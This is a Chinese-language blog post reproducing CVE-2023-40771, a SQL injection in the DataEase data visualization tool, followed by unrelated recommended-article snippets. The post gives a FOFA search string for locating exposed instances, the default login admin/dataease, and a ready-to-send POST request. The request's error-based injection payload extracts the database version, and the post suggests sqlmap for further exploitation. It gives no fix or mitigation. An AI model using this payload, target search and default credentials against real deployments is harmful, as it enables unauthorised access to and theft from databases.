【漏洞复现】DataEase数据可视化分析工具SQL注入-CVE-2023-40771

最新推荐文章于 2024-09-26 06:26:31 发布
最新推荐文章于 2024-09-26 06:26:31 发布
阅读量37 收藏
点赞数
文章标签: 信息可视化 sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33530840/article/details/140019556
版权

1、DataEase数据可视化分析工具简介

DataEase 是开源的数据可视化分析工具,帮助用户快速分析数据并洞察业务趋势,从而实现业务的改进与优化。DataEase 支持丰富的数据源连接,能够通过拖拉拽方式快速制作图表,并可以方便与他人分享。
前端:Vue.js、Element
图库:Apache ECharts、AntV
后端:Spring Boot
中间件:MySQL
数据处理:Kettle、Apache Doris
基础设施:Docker

图片

2、漏洞描述

DataEase存在SQL注入漏洞,不受SQL注入黑名单影响

3、受影响版本

DataEase ≤ v.1.18.9

4、FOFA语句

"DataEase"

5、漏洞复现

SQL 语句使用 ${} 符号位于以下文件位置。https://github.com/dataease/dataease/blob/dev/backend/src/main/java/io/dataease/ext/query/GridSql.xml
图片

POC

POST /api/log/logGrid/1/10 HTTP/1.1
{"orders":["time desc"],"conditions":[{"field":"123 AND GTID_SUBSET(CONCAT(0x716a6a6b71,(SELECT version()),0x716a6a6a71),1215)) RLIKE (SELECT (CASE WHEN (8626=8626) THEN 0x31323320414e4420475449445f53554253455428434f4e434154283078373136613661366237312c2853454c4543542076657273696f6e2829292c307837313661366136613731292c3132313529 ELSE 0x28 END)) AND (7803=7803"}]}

需要登录,admin/dataease
点击操作日志,抓包
使用SQLMAP

小C学安全
关注
DataEase数据可视化分析工具 v2.3.0.zip
03-18
DataEase是一款强大的数据可视化分析工具,其最新版本v2.3.0提供了丰富的功能和优化的用户体验,旨在帮助用户高效地探索、理解并呈现复杂的数据。这个压缩包“DataEase数据可视化分析工具 v2.3.0.zip”包含了该软件...
DataEase数据可视化分析工具 v1.18.5
04-21
DataEase 是开源的数据可视化分析工具,帮助用户快速分析数据并洞察业务趋势,从而实现业务的改进与优化。DataEase 支持丰富的数据源连接,能够通过拖拉拽方式快速制作图表,并可以方便的与他人分享
DataEase数据可视化分析工具 v1.18.15.zip
03-18
DataEase是一款强大的数据可视化分析工具,它提供了直观的界面和高效的数据处理能力,使得非技术人员也能轻松进行数据探索和分析。v1.18.15版本是该工具的一个更新迭代,可能包含了性能优化、新功能添加或者问题修复...
DataEase数据可视化分析工具 v1.18.10.zip
10-03
DataEase是一款强大的数据可视化分析工具,它旨在帮助用户轻松地从海量数据中提取价值,通过直观的图表和仪表板呈现复杂的数据关系。该版本v1.18.10是其发展过程中的一个重要里程碑,提供了丰富的功能和改进,以提升...
DataEase 是开源的数据可视化分析工具( BI 工具
05-13
DataEase 是开源的数据可视化分析工具,帮助用户快速分析数据并洞察业务趋势,从而实现业务的改进与优化。DataEase 支持丰富的数据源连接,能够通过拖拉拽方式快速制作图表,并可以方便地与他人分享
《AI办公类工具表格处理系列之一——办公小浣熊》
再见孙悟空的专栏
09-24 122
小浣熊家族 Raccoon - AI 智能助手办公小浣熊是基于“日日新SenseNova4.0”大模型能力推出的一款新型AI数据分析工具,旨在简化数据分析过程,提高工作效率,帮助用户快速获取洞察力。支持多种文件格式:办公小浣熊支持多种常见的数据文件格式,包括xlsx、xls、csv、txt、json等,用户可以轻松导入数据进行分析。文件大小限制:在公测期间,对个人用户免费开放,但单轮对话支持不超过3个文件的上传,单个文件大小不超过20MB;
​智慧铜矿厂综合管控平台,智慧矿山数字孪生
二三维数据可视化/数字孪生
09-23 1240
HT 铜矿综合管控平台,依托图扑软件的 HT for Web 尖端技术,展示了 HT 平台在铜矿厂管理中的全面应用,通过实时数据采集和 3D 可视化,全面监控矿山开采、选矿、运输、仓储等各个环节。实时显示设备状态、生产进度和安全监测数据,帮助管理者快速决策,提升生产效率。不仅显著提升了矿山的运营效率与核心竞争力,更在促进技术创新、优化资源利用、保障安全生产与推动可持续发展方面展现出巨大潜力,引领铜矿企业迈向精细化管理与现代化转型的新征程。
计算机毕设设计推荐-基于python+Djanog大数据的电影数据可视化分析
BYSJLG的博客
09-21 1331
随着互联网的快速发展,影视行业的数据规模逐渐增大,电影的相关数据呈现出海量、多样化的特点。传统的数据分析方式难以有效处理和分析这些庞杂的电影数据,无法为用户提供准确、全面的电影推荐及消费指导。此外,电影行业的用户行为分析和市场趋势预测也面临数据处理性能和可视化展示的挑战。因此,开发一个基于大数据技术的电影数据可视化分析系统显得尤为重要,旨在解决现有系统中数据处理效率低、用户体验不佳等问题。
如何用LightningChart Python实现地震强度数据可视化应用程序?
需要界面开发、IDE工具研发中文教程资料的小伙伴,记得私信我~
09-23 1253
本文将为大家介绍如何用图表控件LightningChart Python实现一个地震强度数据可视化的Python应用程序,欢迎联系我们获取新产品试用!
Tableau|一入门
weixin_74727170的博客
09-24 995
BI 工具即商业智能(Business Intelligence)工具,是一种用于收集、整理、分析和展示企业数据的软件系统,其主要目的是帮助企业用户更好地理解和利用数据,以支持决策制定。主要功能:1.数据整合:能够从多个数据源(如数据库、Excel 文件、文本文件、网络服务等)抽取数据,并将这些数据整合到一个统一的数据仓库或数据集市中。2.数据分析:提供各种分析方法和工具,帮助用户深入挖掘数据中的信息。包括数据查询、数据透视、统计分析、预测分析等功能。
企业数据可视化大屏的工具选择有哪些
数聚股份
09-24 491
数据作为企业的核心的资产已经越发的受到企业管理层的关注,数据不仅作为企业日常经营做出决策的重要依据,同时更是推动企业进行变革的核心,那么更好的利用数据以及解读各类数据报表就是最为核心的,所以也就带来了数据可视化的产品应用而生。数据可视化不仅带来对于数据的深度解答,同时也方便管理层可以快速决策,避免错失市场良机。那么如何选择适合企业的数据可视化大屏工具就成了重中之重,下面数聚股份就从多年的从业经验来详细的分析注意事项以及工具选择。
【D3.js in Action 3 精译_024】3.4 让 D3 数据适应屏幕(上)
PeacefulWinter的博客
09-21 995
本篇为《D3.js in Action》最新第3版3.4小节内容的上篇,主要介绍了不同类型的 D3 比例尺在将各类数据(连续型、离散型)转换为用于屏幕渲染的视觉属性(尺寸大小、颜色、方位信息等)时的具体做法及考虑因素。同时以一个生动形象的案例切入,配合精心制作的插图,可以让 D3 新手快速熟悉比例尺的相关术语及用法,建议收藏转发。
使用Plotly绘制交互式图表:从入门到精通
最新发布
windowshht的博客
09-26 371
Plotly 是一个开源的图表库,支持多种编程语言,包括 Python、R 和 JavaScript。它的特点是能够创建高质量的交互式图表,适用于数据分析、报告和仪表盘。# 创建一个简单的折线图fig.show()Plotly 提供了丰富的自定义选项,可以通过和方法进行图表的美化和功能增强。title='自定义图表标题',xaxis_title='X 轴标题',yaxis_title='Y 轴标题',legend_title='图例标题',font=dict(size=18,
案例研究丨国控星鲨利用DataEase释放数据潜能,重塑业务视野
FIT2CLOUD飞致云的博客
09-23 1073
“中华老字号”企业的数据可视化实践。
【Python】数据可视化之分布图
Frost_Descent的博客
09-23 1441
分布图主要用来展示某些现象或数据在地理空间、时间或其他维度上的分布情况。它可以清晰地反映出数据的空间位置、数量、密度等特征,帮助人们更好地理解数据的内在规律和相互关系。
Pandas-日期类型处理代码详解
2201_75415080的博客
09-23 1337
概述和其它语言类似, Python内置了datetime对象,可以在datetime库中找到pandas的日期时间类型默认是 datetime64[ns]实例代码Python中的-日期时间类型# 导包from datetime import datetime # 这个是原生Python包的内容​# 场景1: 演示Python中的 日期时间类型# 1. 获取当前时间​# 2. 可以手动设置日期.​# 3. 计算两个日期差.Pandas中的-日期时间类型。
WRF-LES与PALM微尺度气象大涡模拟
weixin_xiao5kou4chang6kai4的博客
09-24 340
大涡模拟通过直接解析大尺度湍流涡旋,而将较小尺度的湍流效应通过亚格子模型来参数化,从而在保持计算可行性的同时,提供了对这些复杂动态的深入理解。PALM特别适用于城市和复杂地形环境中的流场模拟,而WRF-LES则在捕捉大尺度驱动下的边界层演变中表现出色。通过实际案例和模拟练习,将学习如何配置和运行这些模型,理解它们在实际气象研究中的应用, 为未来在大气科学和相关领域的研究或实际应用提供强有力的支持。3、WRF-LES模拟:90m模拟。3、裁剪、转投影和重分类操作。4、PALM模拟:10m模拟。
计算机毕业设计推荐-基于python的白酒销售数据可视化分析
BYSJLG的博客
09-21 1226
近年来,随着大数据和信息化技术的飞速发展,数据分析在各个行业中的应用日益广泛。白酒作为中国传统文化中的重要组成部分,在国内外市场中都占据了重要地位。然而,随着市场竞争的加剧,如何通过数据分析准确把握白酒销售市场的动态,优化营销策略,提升企业的市场竞争力,成为白酒企业迫切需要解决的问题。基于Python的销售数据可视化分析,依托于Python强大的数据处理能力和丰富的可视化库,能够对海量的销售数据进行有效分析和展示,从而为企业决策提供数据支持。
2024年华为杯中国研究生数学建模竞赛E题(高速公路应急车道紧急启用模型)思路
斯黄人民的博客
09-21 753
本文针对2024年中国研究生数学建模竞赛E题,详细讨论了高速公路应急车道紧急启用模型的建模与求解过程。首先,通过分析四个观测点的交通流量、密度和速度数据,揭示交通流参数随时间的变化规律。接着,基于LWR交通流模型与时序预测模型(如ARIMA),建立拥堵预警模型,提前10分钟发出拥堵预警。然后,提出启用应急车道的标准和方法,通过实时数据分析流量和车速来决定是否启用应急车道。最后,利用聚类分析优化监控点的布置,确保监控系统在关键位置发挥最大效用。
DataEase数据库数据集和SQL数据集区别
03-29
DataEase中的数据库数据集和SQL数据集的区别如下: 1. 数据库数据集:是一种数据表格集合,可以包含多个表格,每个表格可以包含多个字段。数据集可以在DataEase中创建和管理,可以用于存储和管理数据。 2. SQL数据集:是一种通过SQL语句从数据库中提取数据的集合。SQL数据集可以使用DataEase中的SQL编辑器创建,可以执行SQL语句来获取数据。 3. 数据来源:数据库数据集可以从DataEase中的数据表格中获取数据,而SQL数据集可以从任何支持SQL数据库中获取数据。 4. 数据处理:数据库数据集支持DataEase中的数据处理功能,包括数据验证、计算字段、关联等,而SQL数据集只能提取数据,无法进行数据处理。 5. 数据更新:数据库数据集可以通过DataEase中的表单进行数据更新,而SQL数据集只能提取数据,无法进行数据更新。 6. 数据安全:数据库数据集可以受到DataEase中的安全机制的保护,而SQL数据集需要通过SQL语句进行安全控制。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值